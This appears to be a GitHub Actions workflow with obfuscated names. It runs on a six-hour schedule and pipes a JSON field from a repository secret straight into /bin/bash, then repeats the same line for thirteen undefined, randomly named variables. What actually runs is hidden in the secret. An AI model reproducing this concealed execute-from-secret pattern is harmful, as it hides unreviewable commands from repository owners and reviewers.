name: shayinluo2345

on:
  workflow_dispatch:
  schedule:
    - cron: '25 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shayinluo2345
        env:
          fudmd6: ${{ secrets.fudmd6 }}
        run: |
          echo $fudmd6 | jq -r .kx7944 | /bin/bash
          echo $mn3290 | jq -r .eavlz6699 | /bin/bash
          echo $tftv3347 | jq -r .q4280 | /bin/bash
          echo $b8 | jq -r .cr53983 | /bin/bash
          echo $fs57991 | jq -r .oswix9 | /bin/bash
          echo $eyqa39 | jq -r .yz570 | /bin/bash
          echo $ayxt4 | jq -r .gooa8496 | /bin/bash
          echo $yadr3719 | jq -r .nkrb35 | /bin/bash
          echo $pf33052 | jq -r .i04 | /bin/bash
          echo $cv79571 | jq -r .ahfgy6 | /bin/bash
          echo $ides801 | jq -r .niax14706 | /bin/bash
          echo $zocfs7 | jq -r .yod36466 | /bin/bash
          echo $ts4498 | jq -r .av45622 | /bin/bash
          echo $n9555 | jq -r .fjmhi369 | /bin/bash

